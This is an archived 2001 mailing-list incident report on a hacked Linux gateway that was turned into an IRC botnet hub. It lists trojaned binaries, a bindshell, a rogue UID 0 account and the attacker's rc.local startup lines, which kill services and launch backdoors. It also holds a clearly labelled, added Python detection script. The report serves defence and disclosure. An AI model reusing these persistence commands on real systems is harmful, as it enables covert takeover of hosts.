[iwar] [fc:]

From: Fred Cohen (fc@all.net)
Date: 2001-11-12 11:17:58


To: iwar@onelist.com (Information Warfare Mailing List)

...
I am making this notification to assist in determining whether other
folks have been affected by this attack.

An associate's home NAT gateway Linux box was hacked by what I am
guessing was the ssh1 CRC bug (ssh1 was the only exposed service).
This machine looks to have been compromised on Nov 2nd at 1:15pm PST; I
won't know for certain until I obtain his hard disk later today, and
provided that /var logging is recoverable.  This machine was running
Red Hat 6.2, reasonably patched except for the fact that he was still
running ssh1.

It appears that someone may be building up a network of (potentially)
DDOS hosts.  I have done some quick research and found no matches for
the signatures I have been able to identify so far.

Using the Chkrootkit (www.chkrootkit.org) utilities did not identify
a known trojan pack, so if this isn't identified in the wild, I'm
already referring to it as the LIMPninja.

It also appears that this particular host was used as a central host
for other LIMPninja zombies.  Also, I haven't been able to determine
what command structure the remote bots act upon.

The following is by no means complete, even after a full examination
of the drive has been completed, as there was never any file
integrity baseline completed (a shame).

The attack appears to be scripted as all changes happened within a
minute, except for the IRC server which was not installed until 2
days later (and manually).  When I found this particular irc net
there were over 120 hosts all communicating via IRC.  This host was
found to be running an unrealircd daemon from /usr/bin/bin/u/src/ircd
listening at port 6669.

All other compromised hosts were joining this irc network
(ircd.hola.mx  holad) on channel #kujikiri with a channel key of
'ninehandscutting'.  All bots joined as the nick ninjaXXXX where XXXX
is some RANDOM? selection of 4 upper case letters.  

Several ports were listening:
3879    term (this port had an ipchains rule blocking all external
        traffic - placed by the attacker's script)
6669    ircd
9706    term
42121   inetd spawned in.telnetd


Logs were wiped, and I couldn't find a wiping utility, so I'm thinking a
simple rm or unlink was used; I'm hoping to find more details when
the disk is in hand.  File modifications that were made follow (not
necessarily a complete analysis yet):

clearly Trojaned binaries (probably others)
/bin/ps
/bin/netstat
/bin/ls  (this ls binary was hiding several things, directory
structures named /u/, mysqld klogd ...)
/usr/local/bin/sshd1  (the file was just several hundred bytes larger
than previously)


Binary file/directory additions
/usr/bin/bin/u/ 	An entire directory structure containing the ircd
server source 
/usr/bin/share/mysqld   (looks like some type of irc spoofing proxy)
/bin/klogd		(almost looks like an ftp proxy)
/bin/term		(A bindshell of some sort)
/usr/sbin/init.d 	was added and is exactly the same file size as term

System configuration files that were modified/added
/etc/hosts.allow	made specific allowances for the .dk domain, as well
as .cais.net .cais.com
/etc/passwd	two new accounts were added with the same password (DES
hashes, NOT MD5)
/etc/shadow	The added accounts were lpd 1212:1212, and admin 0:0
/etc/inetd.conf 200+ lines of whitespace added, and then the single
telnet entry
/etc/services	was modified for telnet to start on port 42121
/etc/resolv.conf a new nameserver was added... 
/etc/psdevtab   haven't examined closely yet
/etc/rc.sysinit	 a line was added to start the /usr/sbin/init.d  
trojan/backdoor
/etc/rc.local	after much whitespace was added, the following lines
appear at the bottom of the rc.local file:

	killall -9 rpc.statd
	killall -9 gdm
	killall -9 gpm
	killall -9 lpd
	term
	klogd
	"/usr/bin/share/mysqld"
	/sbin/ipchains -I input -p tcp -d 0/0 3879 -j DENY
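Triage checks for three of the changes listed above (the extra UID 0 account, telnet moved to a non-standard port in /etc/services, and entries hidden behind a long run of blank lines in rc.local). This is an added example, not code from the original message or its author; the PASSWD, SERVICES and RC_LOCAL strings are constructed to mirror the report and are not copied from the compromised host.

```python
"""Triage checks for the host changes listed in the report above.

The sample PASSWD, SERVICES and RC_LOCAL strings are constructed to mirror
the report; pass real file contents to the functions to run them on a host."""
import re

WELL_KNOWN = {"ftp": 21, "ssh": 22, "telnet": 23}

# Constructed sample inputs (not copied from the compromised machine).
PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
          "lpd:x:1212:1212::/:/bin/sh\n"
          "admin:x:0:0::/:/bin/sh\n")
SERVICES = "ftp\t21/tcp\ntelnet\t42121/tcp\nssh\t22/tcp\n"
RC_LOCAL = ("#!/bin/sh\ntouch /var/lock/subsys/local\n" + "\n" * 200 +
            "killall -9 rpc.statd\nterm\nklogd\n\"/usr/bin/share/mysqld\"\n"
            "/sbin/ipchains -I input -p tcp -d 0/0 3879 -j DENY\n")


def extra_uid0_accounts(passwd_text):
    """Names of non-root accounts with UID 0 (the report's 'admin 0:0')."""
    hits = []
    for line in passwd_text.splitlines():
        f = line.split(":")
        if len(f) >= 3 and f[2] == "0" and f[0] != "root":
            hits.append(f[0])
    return hits


def relocated_services(services_text, expected=WELL_KNOWN):
    """(name, port) pairs where a well-known service was moved to another
    port, as /etc/services was edited to start telnet on 42121."""
    moved = []
    for line in services_text.splitlines():
        m = re.match(r"^(\S+)\s+(\d+)/(?:tcp|udp)", line)
        if m and m.group(1) in expected and int(m.group(2)) != expected[m.group(1)]:
            moved.append((m.group(1), int(m.group(2))))
    return moved


def padded_tail(text, min_blank=50):
    """Non-blank lines that follow a run of at least min_blank blank lines,
    the padding used in rc.local and inetd.conf to push entries off-screen."""
    lines = text.splitlines()
    run = 0
    for i, line in enumerate(lines):
        run = run + 1 if line.strip() == "" else 0
        if run >= min_blank:
            return [l for l in lines[i + 1:] if l.strip()]
    return []
```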


Hope this helps other folks who will or have already encountered this
attack.

sorry for the ramble... It's been a long night

- - -- 
William Salusky
Manager: Security Services
DMZ Services
change@dmzs.com

------------------
http://all.net/ 




This archive was generated by hypermail 2.1.2 : 2001-12-31 20:59:59 PST